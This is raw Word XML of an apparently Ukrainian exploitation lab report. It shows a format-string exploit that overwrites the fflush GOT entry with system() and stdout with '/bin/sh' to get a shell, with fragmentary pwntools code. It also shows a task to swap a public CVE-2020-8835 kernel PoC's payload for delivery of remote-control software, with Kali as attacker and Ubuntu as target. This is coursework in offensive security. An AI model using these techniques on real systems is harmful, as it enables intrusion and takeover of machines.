        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00A575C9" w:rsidRPr="006E4886">
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r w:rsidR="00A16E99">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00A16E99" w:rsidRPr="00801B98">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A16E99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>STDOUT</w:t>
      </w:r>
      <w:r w:rsidR="006E4886" w:rsidRPr="006E4886">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006E4886">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Офсет = 8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC72BEE" w14:textId="1DA0B682" w:rsidR="00D027A9" w:rsidRDefault="00E668A8" w:rsidP="00F103DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39866787" wp14:editId="4345C1C9">
            <wp:extent cx="6645910" cy="1284605"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="69514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87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D2AE" w14:textId="1013EFFF" w:rsidR="00F103DF" w:rsidRPr="00110FC6" w:rsidRDefault="009A39B4" w:rsidP="00F103DF">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>4.6</w:t>
      </w:r>
      <w:r w:rsidR="005B4630">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F103DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">В секції </w:t>
      </w:r>
      <w:r w:rsidR="00F103DF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GOT</w:t>
      </w:r>
      <w:r w:rsidR="00F103DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00F103DF" w:rsidRPr="00CF61AC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F103DF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>got</w:t>
      </w:r>
      <w:r w:rsidR="00F103DF" w:rsidRPr="00CF61AC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F103DF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:r w:rsidR="00F103DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">) перезаписати адресу ф. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F103DF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fflush</w:t>
      </w:r>
      <w:r w:rsidR="00F103DF" w:rsidRPr="0040662C">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F103DF" w:rsidRPr="0040662C">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00F103DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> адресою </w:t>
      </w:r>
      <w:r w:rsidR="00F103DF">
        <w:t xml:space="preserve">ф. </w:t>
      </w:r>
      <w:r w:rsidR="00F103DF" w:rsidRPr="004757CA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidR="00F103DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00110FC6" w:rsidRPr="00110FC6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E9DF39" w14:textId="0FEBADAF" w:rsidR="00F103DF" w:rsidRPr="00110FC6" w:rsidRDefault="009A39B4" w:rsidP="00294C0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>4.7</w:t>
      </w:r>
      <w:r w:rsidR="005B4630">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EF5614">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">В секції </w:t>
      </w:r>
      <w:r w:rsidR="00EF5614">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BSS</w:t>
      </w:r>
      <w:r w:rsidR="00EF5614" w:rsidRPr="006861B0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (.</w:t>
      </w:r>
      <w:r w:rsidR="00EF5614">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bss</w:t>
      </w:r>
      <w:r w:rsidR="00EF5614" w:rsidRPr="006861B0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00EF5614">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">перезаписати </w:t>
      </w:r>
      <w:r w:rsidR="00373B3A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">значення глобальної змінної </w:t>
      </w:r>
      <w:r w:rsidR="00373B3A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stdout</w:t>
      </w:r>
      <w:r w:rsidR="006861B0" w:rsidRPr="006861B0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006861B0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">адресою рядка </w:t>
      </w:r>
      <w:r w:rsidR="006861B0" w:rsidRPr="006861B0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"/</w:t>
      </w:r>
      <w:r w:rsidR="006861B0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidR="006861B0" w:rsidRPr="006861B0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="006861B0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r w:rsidR="006861B0" w:rsidRPr="006861B0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="006861B0" w:rsidRPr="00110FC6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5697E2" w14:textId="77777777" w:rsidR="00F266E6" w:rsidRPr="00F266E6" w:rsidRDefault="00F266E6" w:rsidP="00F266E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F266E6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fflush(stdout) =&gt; system("/bin/sh")</w:t>
      </w:r>
      <w:r w:rsidRPr="00F266E6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_offset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8  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F266E6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Offset of the buffer in printf() output</w:t>
      </w:r>
      <w:r w:rsidRPr="00F266E6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w_addr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elf.address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F266E6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0x4050  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F266E6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Address of FILE *stdout (stdout@GLIBC_2_2_5)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F266E6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flush_got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elf.got[</w:t>
      </w:r>
      <w:r w:rsidRPr="00F266E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fflush"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ystem_sym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ibc.sym[</w:t>
      </w:r>
      <w:r w:rsidRPr="00F266E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ystem"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binsh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ext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bc.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F266E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arch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66E6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/bin/sh"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ayload_writes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fflush_got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ystem_sym,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rw_addr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insh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}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tdin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mtstr_payload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buf_offset, payload_writes, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F266E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write_size </w:t>
      </w:r>
      <w:r w:rsidRPr="00F266E6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66E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hort"</w:t>
      </w:r>
      <w:r w:rsidRPr="00F266E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44C59252" w14:textId="77777777" w:rsidR="00966211" w:rsidRDefault="00966211" w:rsidP="00966211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9F8B5F" w14:textId="77777777" w:rsidR="001E4DA9" w:rsidRDefault="001E4DA9" w:rsidP="00F73A2E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E4DA9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Виконаємо експлойт без дебагу:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA132C1" w14:textId="6CFD407A" w:rsidR="00F73A2E" w:rsidRPr="00803FAB" w:rsidRDefault="00F73A2E" w:rsidP="00F73A2E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00803FAB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>$ python3 task</w:t>
      </w:r>
      <w:r w:rsidR="00821F33">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00803FAB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A6E34A" w14:textId="138BCA8C" w:rsidR="00BB2698" w:rsidRDefault="008053A6" w:rsidP="00966211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74E61EB8" wp14:editId="74CE2CE2">
            <wp:extent cx="6645910" cy="6696075"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="211680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7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74D" w14:textId="77777777" w:rsidR="00BB2698" w:rsidRDefault="00BB2698" w:rsidP="00966211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05515D52" w14:textId="22FF9A46" w:rsidR="00004B8A" w:rsidRDefault="00004B8A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C68E1E0" w14:textId="77777777" w:rsidR="00AB2F59" w:rsidRPr="00AB2F59" w:rsidRDefault="00AB2F59" w:rsidP="00B00B3B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2F59">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4) Для PoC експлоїтiв у вiдкритому доступi [43] замiнiть навантаження на доставку i запуск системи вiддаленого керування. Вразливiсть за варiантом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CE3749" w14:textId="2EADF8F0" w:rsidR="00406F73" w:rsidRDefault="00AB2F59" w:rsidP="00BB7E1C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2F59">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>9. CVE-2020-8835</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291430DB" w14:textId="6B9460A4" w:rsidR="00057821" w:rsidRDefault="00702F59" w:rsidP="00057821">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="008E7891" w:rsidRPr="00F86081">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E7891">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>атакуючого</w:t>
      </w:r>
      <w:r w:rsidR="000D2000">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00D51EC2" w:rsidRPr="00F86081">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D51EC2" w:rsidRPr="00F86081">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000D2000">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidR="000D2000" w:rsidRPr="00F86081">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D51EC2" w:rsidRPr="00F86081">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2022.4 </w:t>
      </w:r>
      <w:r w:rsidR="00D51EC2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00D51EC2" w:rsidRPr="00F86081">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="00B44836" w:rsidRPr="00F86081">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00770F92" w:rsidRPr="00F86081">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>192.168.1.18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF750A5" w14:textId="4910557A" w:rsidR="00057821" w:rsidRPr="00F86081" w:rsidRDefault="00D051AD" w:rsidP="00057821">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Цільова</w:t>
      </w:r>
      <w:r w:rsidR="00C82CAF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00057821">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="00057821">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00057821" w:rsidRPr="00F86081">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00057821" w:rsidRPr="00F86081">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="001105B9" w:rsidRPr="00D20678">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Ubuntu</w:t>
        </w:r>
        <w:r w:rsidR="001105B9" w:rsidRPr="00D20678">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="uk-UA"/>
          </w:rPr>
          <w:t xml:space="preserve"> 21.04</w:t>
        </w:r>
        <w:r w:rsidR="00057821" w:rsidRPr="00D20678">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="uk-UA"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="00057821" w:rsidRPr="00D20678">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>x</w:t>
        </w:r>
        <w:r w:rsidR="00057821" w:rsidRPr="00D20678">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="uk-UA"/>
          </w:rPr>
          <w:t>64</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001105B9" w:rsidRPr="00F86081">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00057821" w:rsidRPr="00F86081">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>192.168.1.</w:t>
      </w:r>
      <w:r w:rsidR="001105B9" w:rsidRPr="00F86081">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD72223" w14:textId="77777777" w:rsidR="0094159E" w:rsidRPr="00852EE8" w:rsidRDefault="0094159E" w:rsidP="00A20B86">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6939AD04" w14:textId="7F24C15F" w:rsidR="00E3707C" w:rsidRPr="008352CA" w:rsidRDefault="008352CA" w:rsidP="00A20B86">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Опис вразливості </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidR="00E37304" w:rsidRPr="00485125">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CVE</w:t>
        </w:r>
        <w:r w:rsidR="00E37304" w:rsidRPr="00485125">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="uk-UA"/>
          </w:rPr>
          <w:t>-2020</w:t>
        </w:r>
        <w:r w:rsidR="00E37304" w:rsidRPr="00485125">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="uk-UA"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00E37304" w:rsidRPr="00485125">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="uk-UA"/>
          </w:rPr>
          <w:t>8835</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693F8289" w14:textId="7E436F3B" w:rsidR="00BC501F" w:rsidRPr="00E71D53" w:rsidRDefault="00D33A6C" w:rsidP="00A20B86">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC501F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">У ядрі </w:t>
      </w:r>
      <w:r w:rsidRPr="00D33A6C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC501F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.5</w:t>
      </w:r>
      <w:r w:rsidR="00B50D3B" w:rsidRPr="00B50D3B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-5.</w:t>
      </w:r>
      <w:r w:rsidR="00B50D3B" w:rsidRPr="002565A3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC501F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> верифікатор </w:t>
      </w:r>
      <w:r w:rsidRPr="00D33A6C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bpf</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC501F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33A6C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC501F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33A6C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bpf</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC501F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33A6C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>verifier</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC501F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33A6C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC501F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>) не обмеж</w:t>
      </w:r>
      <w:r w:rsidR="00B46865">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ує</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC501F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> межі регістру для 32-розрядних операцій, що призв</w:t>
      </w:r>
      <w:r w:rsidR="00144A07">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>одить</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC501F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> до читання та запису поза межами пам’яті ядра.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778836ED" w14:textId="77777777" w:rsidR="00F36E2D" w:rsidRPr="00621F32" w:rsidRDefault="00F36E2D" w:rsidP="00A20B86">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D36058" w14:textId="45C54FF3" w:rsidR="000D2000" w:rsidRPr="002A4D62" w:rsidRDefault="002A4D62" w:rsidP="00A20B86">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Огляд </w:t>
      </w:r>
      <w:r w:rsidR="009D2BAB">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">версії ядра </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ubuntu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A643DD" w14:textId="644C5E87" w:rsidR="00A20B86" w:rsidRPr="00074423" w:rsidRDefault="00A20B86" w:rsidP="00A20B86">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00074423">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00074423">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lsb_release -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2522E133" w14:textId="127946FA" w:rsidR="005C32F6" w:rsidRPr="00074423" w:rsidRDefault="00A20B86" w:rsidP="00AB2F59">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00074423">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>$ uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6E6079" w14:textId="230F5D5D" w:rsidR="00BE5C17" w:rsidRDefault="00D924FD" w:rsidP="00AB2F59">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F7D7243" wp14:editId="424251D6">
            <wp:extent cx="6645910" cy="1083945"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="9020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6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DF3" w14:textId="77777777" w:rsidR="00B26F80" w:rsidRDefault="00B26F80" w:rsidP="00BE5C17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E7A111" w14:textId="29F3C49F" w:rsidR="00B4236F" w:rsidRPr="00B4236F" w:rsidRDefault="00B4236F" w:rsidP="00BE5C17">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Підготовка</w:t>
      </w:r>
      <w:r w:rsidR="002E7361">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E7361">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ц</w:t>
      </w:r>
      <w:r w:rsidR="002E7361">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ільов</w:t>
      </w:r>
      <w:r w:rsidR="002E7361">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ої</w:t>
      </w:r>
      <w:r w:rsidR="002E7361">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> ОС</w:t>
      </w:r>
      <w:r w:rsidR="00BA125E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00BA125E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ubuntu 21.04</w:t>
      </w:r>
      <w:r w:rsidR="00BA125E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9577F1" w14:textId="4ED0DCF7" w:rsidR="00BE5C17" w:rsidRDefault="00FC6956" w:rsidP="00BE5C17">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Замінимо репозиторі</w:t>
      </w:r>
      <w:r w:rsidR="00071A4E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ї "</w:t>
      </w:r>
      <w:r w:rsidR="00071A4E" w:rsidRPr="00BE5C17">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="00071A4E" w:rsidRPr="00071A4E">
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidR="00071A4E" w:rsidRPr="00BE5C17">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ua</w:t>
      </w:r>
      <w:r w:rsidR="00071A4E" w:rsidRPr="00071A4E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00071A4E" w:rsidRPr="00BE5C17">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>archive</w:t>
      </w:r>
